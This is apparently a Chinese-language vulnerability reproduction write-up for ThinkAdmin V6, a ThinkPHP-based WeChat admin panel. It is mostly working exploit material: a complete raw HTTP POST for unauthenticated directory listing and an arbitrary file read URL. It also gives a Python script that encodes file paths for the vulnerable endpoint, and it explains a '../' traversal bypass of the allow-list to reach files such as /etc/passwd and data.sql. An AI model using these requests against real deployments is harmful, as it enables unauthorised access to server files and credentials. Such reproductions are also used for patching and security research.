ThinkAdminV6漏洞復現
一、簡介
ThinkAdmin是基於 ThinkPHP 的微信后台管理平台
二、漏洞影響版本
ThinkAdminV6
三、漏洞復現
未授權列目錄:
POC:
POST /admin.html?s=admin/api.Update/node HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 22 rules=%5B%22.%2F%22%5D
1、目錄遍歷注意POST數據包rules參數值需要URL編碼
任意文件讀取:
ThinkAdmin V6.0 <=2020.08.03.01
判斷版本
POC:
/admin.html?s=admin/api.Update/get/encode/xxx
文件加密腳本
import requests,json,base64,sys def baseN(num, b): return ((num == 0) and "0") or \ (baseN(num // b, b).lstrip("0") + "0123456789abcdefghijklmnopqrstuvwxyz"[num % b]) def poc(url): while 1: s = input("請輸入需要讀取的文件路徑:").encode('utf-8') if str(s) == "b'exit'": sys.exit(0) try: poc ="" for i in s: poc += baseN(i,36) print(poc) except: pass if __name__ == "__main__": if len(sys.argv) == 2: poc(sys.argv[1]) else: print(""" _____ _ _ _ ___ _ _ |_ _| | (_) | | / _ \ | | (_) | | | |__ _ _ __ | | _/ /_\ \ __| |_ __ ___ _ _ __ | | | '_ \| | '_ \| |/ / _ |/ _` | '_ ` _ \| | '_ \ | | | | | | | | | | <| | | | (_| | | | | | | | | | | \_/ |_| |_|_|_| |_|_|\_\_| |_/\__,_|_| |_| |_|_|_| |_| v6 By: yuyan-sec \t [ThinkAdmin v6 任意文件讀取] Usage: python poc.py [URL] python poc.py http://127.0.0.1 """)
1、首先通過加密腳本或者文件加密之后的一串字符
2、構造訪問,成功讀取/app/admin/controller/Config.php文件,顯示的是經過base64加密之后的字符串,需要進行base64解密
3、嘗試直接讀取別的文件,/app/data/data.sql、/etc/passwd,直接讀取不行,因為
有一個允許的列表:
config
public/static
public/router.php
public/index.php
app/admin
app/wechat
但是可以通過../進行目錄穿越進行繞過
----------------------------------------------------------------------------------------------
參考:https://github.com/zoujingli/ThinkAdmin/issues/244
https://github.com/yuyan-sec/goTools/tree/master/ThinkAdmin